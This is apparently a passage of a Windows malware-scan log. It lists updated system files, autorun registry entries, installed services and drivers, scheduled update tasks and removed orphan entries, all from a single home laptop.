2014-03-06 08:39 . 2014-04-12 19:00	33792	----a-w-	c:\windows\system32\iernonce.dll
2014-03-06 08:32 . 2014-04-12 19:00	574976	----a-w-	c:\windows\system32\ieui.dll
2014-03-06 08:29 . 2014-04-12 19:00	139264	----a-w-	c:\windows\system32\ieUnatt.exe
2014-03-06 08:29 . 2014-04-12 19:00	111616	----a-w-	c:\windows\system32\ieetwcollector.exe
2014-03-06 08:28 . 2014-04-12 19:00	752640	----a-w-	c:\windows\system32\jscript9diag.dll
2014-03-06 08:15 . 2014-04-12 19:00	940032	----a-w-	c:\windows\system32\MsSpellCheckingFacility.exe
2014-03-06 08:11 . 2014-04-12 19:00	5784064	----a-w-	c:\windows\system32\jscript9.dll
2014-03-06 08:09 . 2014-04-12 19:00	453120	----a-w-	c:\windows\system32\dxtmsft.dll
2014-03-06 08:03 . 2014-04-12 19:00	586240	----a-w-	c:\windows\system32\ie4uinit.exe
2014-03-06 08:02 . 2014-04-12 19:00	61952	----a-w-	c:\windows\SysWow64\iesetup.dll
2014-03-06 08:02 . 2014-04-12 19:00	455168	----a-w-	c:\windows\SysWow64\vbscript.dll
2014-03-06 08:01 . 2014-04-12 19:00	51200	----a-w-	c:\windows\SysWow64\ieetwproxystub.dll
2014-03-06 07:56 . 2014-04-12 19:00	38400	----a-w-	c:\windows\system32\JavaScriptCollectionAgent.dll
2014-03-06 07:48 . 2014-04-12 19:00	195584	----a-w-	c:\windows\system32\msrating.dll
2014-03-06 07:46 . 2014-04-12 19:00	4254720	----a-w-	c:\windows\SysWow64\jscript9.dll
2014-03-06 07:42 . 2014-04-12 19:00	296960	----a-w-	c:\windows\system32\dxtrans.dll
2014-03-06 07:38 . 2014-04-12 19:00	112128	----a-w-	c:\windows\SysWow64\ieUnatt.exe
2014-03-06 07:36 . 2014-04-12 19:00	592896	----a-w-	c:\windows\SysWow64\jscript9diag.dll
2014-03-06 07:21 . 2014-04-12 19:00	628736	----a-w-	c:\windows\system32\msfeeds.dll
2014-03-06 07:13 . 2014-04-12 19:00	32256	----a-w-	c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-03-06 07:11 . 2014-04-12 19:00	2043904	----a-w-	c:\windows\system32\inetcpl.cpl
2014-03-06 06:53 . 2014-04-12 19:00	13551104	----a-w-	c:\windows\system32\ieframe.dll
2014-03-06 06:40 . 2014-04-12 19:00	1967104	----a-w-	c:\windows\SysWow64\inetcpl.cpl
2014-03-06 06:22 . 2014-04-12 19:00	2260480	----a-w-	c:\windows\system32\wininet.dll
2014-03-06 05:58 . 2014-04-12 19:00	1400832	----a-w-	c:\windows\system32\urlmon.dll
2014-03-06 05:50 . 2014-04-12 19:00	846336	----a-w-	c:\windows\system32\ieapfltr.dll
2014-03-06 05:41 . 2014-04-12 19:00	1789440	----a-w-	c:\windows\SysWow64\wininet.dll
2014-03-04 09:44 . 2014-04-08 23:53	362496	----a-w-	c:\windows\system32\wow64win.dll
2014-03-04 09:44 . 2014-04-08 23:53	243712	----a-w-	c:\windows\system32\wow64.dll
2014-03-04 09:44 . 2014-04-08 23:53	13312	----a-w-	c:\windows\system32\wow64cpu.dll
2014-03-04 09:44 . 2014-04-08 23:53	16384	----a-w-	c:\windows\system32\ntvdm64.dll
2014-03-04 09:44 . 2014-04-08 23:53	1163264	----a-w-	c:\windows\system32\kernel32.dll
2014-03-04 09:17 . 2014-04-08 23:53	14336	----a-w-	c:\windows\SysWow64\ntvdm64.dll
2014-03-04 09:17 . 2014-04-08 23:53	44032	----a-w-	c:\windows\apppatch\acwow64.dll
2014-03-04 09:16 . 2014-04-08 23:53	25600	----a-w-	c:\windows\SysWow64\setup16.exe
2014-03-04 09:16 . 2014-04-08 23:53	5120	----a-w-	c:\windows\SysWow64\wow32.dll
2014-03-04 08:09 . 2014-04-08 23:53	7680	----a-w-	c:\windows\SysWow64\instnm.exe
2014-03-04 08:09 . 2014-04-08 23:53	2048	----a-w-	c:\windows\SysWow64\user.exe
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00001YSISyncComplete]
@="{89B5F9CC-C4A2-462C-BD27-29CEAC972135}"
[HKEY_CLASSES_ROOT\CLSID\{89B5F9CC-C4A2-462C-BD27-29CEAC972135}]
2014-02-13 04:06	2852920	----a-w-	c:\program files (x86)\Hightail Desktop App\YSINSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00002YSISyncActive]
@="{84B7BDFB-C50A-4335-B7C2-8AEC454F9E25}"
[HKEY_CLASSES_ROOT\CLSID\{84B7BDFB-C50A-4335-B7C2-8AEC454F9E25}]
2014-02-13 04:06	2852920	----a-w-	c:\program files (x86)\Hightail Desktop App\YSINSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00003YSISyncError]
@="{306A9CDE-AC70-453A-8008-B5F9962B8F88}"
[HKEY_CLASSES_ROOT\CLSID\{306A9CDE-AC70-453A-8008-B5F9962B8F88}]
2014-02-13 04:06	2852920	----a-w-	c:\program files (x86)\Hightail Desktop App\YSINSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00004YSILocalOnly]
@="{23A7D2DC-F395-4E33-876C-84A2DFAB0EBB}"
[HKEY_CLASSES_ROOT\CLSID\{23A7D2DC-F395-4E33-876C-84A2DFAB0EBB}]
2014-02-13 04:06	2852920	----a-w-	c:\program files (x86)\Hightail Desktop App\YSINSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CCleaner Monitoring"="c:\program files\CCleaner\CCleaner64.exe" [2014-05-20 6160152]
"Skype"="c:\program files (x86)\Skype\Phone\Skype.exe" [2014-02-10 20922016]
"Messenger (Yahoo!)"="c:\progra~2\Yahoo!\Messenger\YahooMessenger.exe" [2012-05-24 6595928]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"Buffalo RUNONCE"="c:\buffalo\DriveNavi_HD-PUSU3-WR\%SRC_FILE1%" [X]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"HPOSD"="c:\program files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe" [2011-08-19 379960]
"HP CoolSense"="c:\program files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe" [2012-11-05 1343904]
"FLxHCIm64"="c:\program files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe" [2013-06-05 55536]
"HP Quick Launch"="c:\program files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe" [2012-03-05 578944]
"UIExec"="c:\program files (x86)\SMART BRO\UIExec.exe" [2012-05-11 156448]
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe" [2013-07-02 254336]
"KiesTrayAgent"="c:\program files (x86)\Samsung\Kies\KiesTrayAgent.exe" [2014-04-23 311616]
.
c:\users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-5-8 32668056]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Bluetooth.lnk - c:\program files\WIDCOMM\Bluetooth Software\BTTray.exe [2011-9-21 1338144]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Notification Packages	REG_MULTI_SZ scecli c:\program files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 dg_ssudbus;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.);c:\windows\system32\DRIVERS\ssudbus.sys;c:\windows\SYSNATIVE\DRIVERS\ssudbus.sys [x]
R3 GamesAppService;GamesAppService;c:\program files (x86)\WildTangent Games\App\GamesAppService.exe;c:\program files (x86)\WildTangent Games\App\GamesAppService.exe [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 massfilter;Mass Storage Filter Driver;c:\windows\system32\drivers\massfilter.sys;c:\windows\SYSNATIVE\drivers\massfilter.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 RSPCIESTOR;Realtek PCIE CardReader Driver;c:\windows\system32\DRIVERS\RtsPStor.sys;c:\windows\SYSNATIVE\DRIVERS\RtsPStor.sys [x]
R3 SrvHsfHDA;SrvHsfHDA;c:\windows\system32\DRIVERS\VSTAZL6.SYS;c:\windows\SYSNATIVE\DRIVERS\VSTAZL6.SYS [x]
R3 SrvHsfV92;SrvHsfV92;c:\windows\system32\DRIVERS\VSTDPV6.SYS;c:\windows\SYSNATIVE\DRIVERS\VSTDPV6.SYS [x]
R3 SrvHsfWinac;SrvHsfWinac;c:\windows\system32\DRIVERS\VSTCNXT6.SYS;c:\windows\SYSNATIVE\DRIVERS\VSTCNXT6.SYS [x]
R3 ssudmdm;SAMSUNG Mobile USB Modem Drivers (DEVGURU Ver.);c:\windows\system32\DRIVERS\ssudmdm.sys;c:\windows\SYSNATIVE\DRIVERS\ssudmdm.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R3 WDC_SAM;WD SCSI Pass Thru driver;c:\windows\system32\DRIVERS\wdcsam64.sys;c:\windows\SYSNATIVE\DRIVERS\wdcsam64.sys [x]
R3 ZTEusbvoice;ZTE VoUSB Port;c:\windows\system32\DRIVERS\ZTEusbvoice.sys;c:\windows\SYSNATIVE\DRIVERS\ZTEusbvoice.sys [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S1 ccSet_MCLIENT;Norton Management Settings Manager;c:\windows\system32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys;c:\windows\SYSNATIVE\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [x]
S2 c2cautoupdatesvc;Skype Click to Call Updater;c:\program files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe;c:\program files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [x]
S2 c2cpnrsvc;Skype Click to Call PNR Service;c:\program files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe;c:\program files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [x]
S2 cvhsvc;Client Virtualization Handler;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE [x]
S2 FPLService;TrueSuiteService;c:\program files (x86)\HP SimplePass 2012\TrueSuiteService.exe;c:\program files (x86)\HP SimplePass 2012\TrueSuiteService.exe [x]
S2 HP Support Assistant Service;HP Support Assistant Service;c:\program files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe;c:\program files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [x]
S2 HPClientSvc;HP Client Services;c:\program files\Hewlett-Packard\HP Client Services\HPClientServices.exe;c:\program files\Hewlett-Packard\HP Client Services\HPClientServices.exe [x]
S2 HPWMISVC;HPWMISVC;c:\program files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe;c:\program files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe [x]
S2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology;c:\program files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe;c:\program files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [x]
S2 IconMan_R;IconMan_R;c:\program files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe;c:\program files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [x]
S2 irstrtsv;Intel(R) Rapid Start Technology Service;c:\windows\SysWOW64\irstrtsv.exe;c:\windows\SysWOW64\irstrtsv.exe [x]
S2 jhi_service;Intel(R) Identity Protection Technology Host Interface Service;c:\program files (x86)\Intel\Services\IPT\jhi_service.exe;c:\program files (x86)\Intel\Services\IPT\jhi_service.exe [x]
S2 MCLIENT;Norton Management;c:\program files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe;c:\program files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe [x]
S2 NIS;Norton Internet Security;c:\program files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe;c:\program files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe [x]
S2 sftlist;Application Virtualization Client;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe [x]
S2 UI Assistant Service;UI Assistant Service;c:\program files (x86)\SMART BRO\AssistantServices.exe;c:\program files (x86)\SMART BRO\AssistantServices.exe [x]
S2 UNS;Intel(R) Management and Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S3 bcbtums;Bluetooth RAM Firmware Download USB Filter;c:\windows\system32\drivers\bcbtums.sys;c:\windows\SYSNATIVE\drivers\bcbtums.sys [x]
S3 BHDrvx64;BHDrvx64;c:\program files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys;c:\program files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys [x]
S3 btwampfl;btwampfl Bluetooth filter driver;c:\windows\system32\drivers\btwampfl.sys;c:\windows\SYSNATIVE\drivers\btwampfl.sys [x]
S3 BTWDPAN;Bluetooth Personal Area Network;c:\windows\system32\DRIVERS\btwdpan.sys;c:\windows\SYSNATIVE\DRIVERS\btwdpan.sys [x]
S3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\DRIVERS\btwl2cap.sys;c:\windows\SYSNATIVE\DRIVERS\btwl2cap.sys [x]
S3 ccSet_NIS;NIS Settings Manager;c:\windows\system32\drivers\NISx64\1503000.00C\ccSetx64.sys;c:\windows\SYSNATIVE\drivers\NISx64\1503000.00C\ccSetx64.sys [x]
S3 clwvd;CyberLink WebCam Virtual Driver;c:\windows\system32\DRIVERS\clwvd.sys;c:\windows\SYSNATIVE\DRIVERS\clwvd.sys [x]
S3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys;c:\program files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [x]
S3 FLxHCIc;Fresco Logic xHCI (USB3) Device Driver;c:\windows\system32\DRIVERS\FLxHCIc.sys;c:\windows\SYSNATIVE\DRIVERS\FLxHCIc.sys [x]
S3 FLxHCIh;Fresco Logic xHCI (USB3) Hub Device Driver;c:\windows\system32\DRIVERS\FLxHCIh.sys;c:\windows\SYSNATIVE\DRIVERS\FLxHCIh.sys [x]
S3 IDSVia64;IDSVia64;c:\program files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140526.001\IDSvia64.sys;c:\program files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140526.001\IDSvia64.sys [x]
S3 IntcDAud;Intel(R) Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]
S3 irstrtdv;Intel(R) Rapid Start Technology Driver;c:\windows\system32\DRIVERS\irstrtdv.sys;c:\windows\SYSNATIVE\DRIVERS\irstrtdv.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
S3 Sftfs;Sftfs;c:\windows\system32\DRIVERS\Sftfslh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftfslh.sys [x]
S3 Sftplay;Sftplay;c:\windows\system32\DRIVERS\Sftplaylh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftplaylh.sys [x]
S3 Sftredir;Sftredir;c:\windows\system32\DRIVERS\Sftredirlh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftredirlh.sys [x]
S3 Sftvol;Sftvol;c:\windows\system32\DRIVERS\Sftvollh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftvollh.sys [x]
S3 sftvsa;Application Virtualization Service Agent;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [x]
S3 SymDS;Symantec Data Store;c:\windows\system32\drivers\NISx64\1503000.00C\SYMDS64.SYS;c:\windows\SYSNATIVE\drivers\NISx64\1503000.00C\SYMDS64.SYS [x]
S3 SymEFA;Symantec Extended File Attributes;c:\windows\system32\drivers\NISx64\1503000.00C\SYMEFA64.SYS;c:\windows\SYSNATIVE\drivers\NISx64\1503000.00C\SYMEFA64.SYS [x]
S3 SymIRON;Symantec Iron Driver;c:\windows\system32\drivers\NISx64\1503000.00C\Ironx64.SYS;c:\windows\SYSNATIVE\drivers\NISx64\1503000.00C\Ironx64.SYS [x]
S3 SymNetS;Symantec Network Security WFP Driver;c:\windows\System32\Drivers\NISx64\1503000.00C\SYMNETS.SYS;c:\windows\SYSNATIVE\Drivers\NISx64\1503000.00C\SYMNETS.SYS [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-05-23 04:34	1091912	----a-w-	c:\program files (x86)\Google\Chrome\Application\35.0.1916.114\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-05-27 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2013-05-31 16:17]
.
2014-05-27 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-11-25 04:31]
.
2014-05-27 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-11-25 04:31]
.
2014-05-26 c:\windows\Tasks\HPCeeScheduleForHewlett Packard.job
- c:\program files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15 12:43]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00001YSISyncComplete]
@="{89B5F9CC-C4A2-462C-BD27-29CEAC972135}"
[HKEY_CLASSES_ROOT\CLSID\{89B5F9CC-C4A2-462C-BD27-29CEAC972135}]
2014-02-13 04:06	2994232	----a-w-	c:\program files\Hightail Desktop App\YSINSE64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00002YSISyncActive]
@="{84B7BDFB-C50A-4335-B7C2-8AEC454F9E25}"
[HKEY_CLASSES_ROOT\CLSID\{84B7BDFB-C50A-4335-B7C2-8AEC454F9E25}]
2014-02-13 04:06	2994232	----a-w-	c:\program files\Hightail Desktop App\YSINSE64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00003YSISyncError]
@="{306A9CDE-AC70-453A-8008-B5F9962B8F88}"
[HKEY_CLASSES_ROOT\CLSID\{306A9CDE-AC70-453A-8008-B5F9962B8F88}]
2014-02-13 04:06	2994232	----a-w-	c:\program files\Hightail Desktop App\YSINSE64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00004YSILocalOnly]
@="{23A7D2DC-F395-4E33-876C-84A2DFAB0EBB}"
[HKEY_CLASSES_ROOT\CLSID\{23A7D2DC-F395-4E33-876C-84A2DFAB0EBB}]
2014-02-13 04:06	2994232	----a-w-	c:\program files\Hightail Desktop App\YSINSE64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-09-20 167704]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-09-20 392472]
"Persistence"="c:\windows\system32\igfxpers.exe" [2011-09-20 416024]
"SysTrayApp"="c:\program files\IDT\WDM\sttray64.exe" [2011-10-06 1424896]
"SetDefault"="c:\program files\Hewlett-Packard\HP LaunchBox\SetDefault.exe" [2011-09-30 43320]
"Hightail Sync Agent"="c:\program files (x86)\Hightail Desktop App\Hightail.exe" [2014-02-13 7107640]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"NCPluginUpdater"="c:\program files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" [2014-05-13 21720]
.
------- Supplementary Scan -------
.
uStart Page = https://www.google.co.uk/
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~2\MICROS~1\Office14\ONBttnIE.dll/105
IE: Send image to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
TCP: DhcpNameServer = 192.168.0.1
TCP: Interfaces\{FE9B027C-FDEE-4719-AA08-5F56C19B41F3}: NameServer = 8.8.8.8 8.8.4.4
.
- - - - ORPHANS REMOVED - - - -
.
BHO-{9e28b297-11d4-4293-aa6f-558658ee66ae} - (no file)
BHO-{cc28794a-99d4-4b1b-bccf-b065ce5f9feb} - (no file)
Toolbar-{665cb5b7-4c3b-4995-8cec-1f4d5860edc9} - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
HKLM_Wow6432Node-ActiveSetup-{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1} - msiexec
HKLM-Run-SynTPEnh - c:\program files (x86)\Synaptics\SynTP\SynTPEnh.exe
AddRemove-Adobe Shockwave Player - c:\windows\system32\Adobe\Shockwave 11\uninstaller.exe
AddRemove-InstallShield_{20DFF861-31EE-41F6-98D5-0A992AE7D116} - c:\program files\InstallShield Installation Information\{20DFF861-31EE-41F6-98D5-0A992AE7D116}\setup.exe
AddRemove-{EE202411-2C26-49E8-9784-1BC1DBF7DE96} - c:\program files (x86)\InstallShield Installation Information\{EE202411-2C26-49E8-9784-1BC1DBF7DE96}\setup.exe
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MCLIENT]
"ImagePath"="\"c:\program files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe\" /s \"MCLIENT\" /m \"c:\program files (x86)\Norton Management\Engine\3.2.2.12\diMaster.dll\" /prefetch:1"
--
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NIS]
"ImagePath"="\"c:\program files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe\" /s \"NIS\" /m \"c:\program files (x86)\Norton Internet Security\Engine\21.3.0.12\diMaster.dll\" /prefetch:1"
"ImagePath"="\SystemRoot\System32\Drivers\NISx64\1503000.00C\SYMNETS.SYS"
"TrustedImagePaths"="c:\program files (x86)\Norton Internet Security\Engine\21.3.0.12;c:\program files (x86)\Norton Internet Security\Engine64\21.3.0.12"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_13_0_0_214_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_13_0_0_214_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
